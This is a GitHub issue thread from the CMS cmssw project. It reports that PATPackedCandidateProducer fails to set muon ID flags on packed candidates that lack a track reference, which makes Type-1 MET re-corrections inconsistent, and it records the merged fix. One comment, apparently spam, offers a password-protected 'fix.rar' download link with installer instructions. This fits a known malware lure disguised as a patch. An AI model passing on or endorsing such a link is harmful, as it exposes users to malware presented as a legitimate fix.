### ISSUE TITLE
PackedCandidate PF MuonID flags not properly set in PATPackedCandidateProducer? Implications on Type-1 MET re-correction

### ISSUE THREAD

**Issue by nurfikri89** [cms-sw/cmssw#45814]
I have encountered what might be an unintentional wrong set up (?) regarding the MuonID flags of `pat::PackedCandidates` in MiniAODs.  It seems that there are (somewhat rare) instances where `pat::PackedCandidate` PF muons, 
whose `isStandAloneMuon()` and  `isGlobalMuon()` [flags](https://github.com/cms-sw/cmssw/blob/bbbd522740e9dec3d103ceadd44fc0361310e22d/DataFormats/PatCandidates/interface/PackedCandidate.h#L933-L934)  are `false` but for its original `reco::PFCandidate` in the parent AOD, the two MuonID flags are `true`. Technically for the `reco::PFCandidate`, these flags are retrieved through its `muonRef()`.

This inconsistency can be traced back to how the MuonID flags are set up in `PATPackedCandidateProducer`:
https://github.com/cms-sw/cmssw/blob/bbbd522740e9dec3d103ceadd44fc0361310e22d/PhysicsTools/PatAlgos/plugins/PATPackedCandidateProducer.cc#L326-L328
 where `setMuonID()` is called when the `reco::PFCandidate` has `cand.muonRef().isNonnull()` and the candidate has a `trackRef()`:
 
https://github.com/cms-sw/cmssw/blob/bbbd522740e9dec3d103ceadd44fc0361310e22d/PhysicsTools/PatAlgos/plugins/PATPackedCandidateProducer.cc#L244
  
The instances that I mentioned above are when a `reco::PFCandidate` muon have a `muonRef()` but do not have a `trackRef()` . To fix this inconsistency, we just need to move MuonID flags setting block, to outside of the `if (ctrack)` block.

One implication for this is the consistency of Type-1 MET corrections for different data-tiers usage (which is the context of my study). 

The Type-1 correction procedure requires that PF muon candidates inside a jet are to be removed from the jet raw four-vector if it passes `isStandAloneMuon()` or `isGlobalMuon()` flags and this is where the Muon ID flag differences between `reco::PFCandidate` and `pat::PackedCandidate` becomes a source of inconsistency between (Type-1 corrected) MET in MiniAOD and the MET re-corrections when they are done during MiniAOD processing. 

At the **PAT** step, the jet cleaning stage (to remove PF muon constituents) loops over `reco::PFCandidates` while for the **NANO** step (or any analysis using MiniAODs as input), it loops over `pat::PackedCandidates`. This leads to situations where the PF muon is removed because it passes either MuonID flags if it is a `reco::PFCandidate` but it does not get removed when it is a `pat::PackedCandidate` due to the two ID flags not being set at all in PATPackedCandidateProducer.

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by makortel** [comment]
assign PhysicsTools/PatAlgos

**Comment by nurfikri89** [comment]
Fixed with PR #45818, merged with `14_2_X`.

**Comment by hqucms** [comment]
+1

**Comment by jfernan2** [comment]
+1

**Comment by makortel** [comment]
@cmsbuild, please close
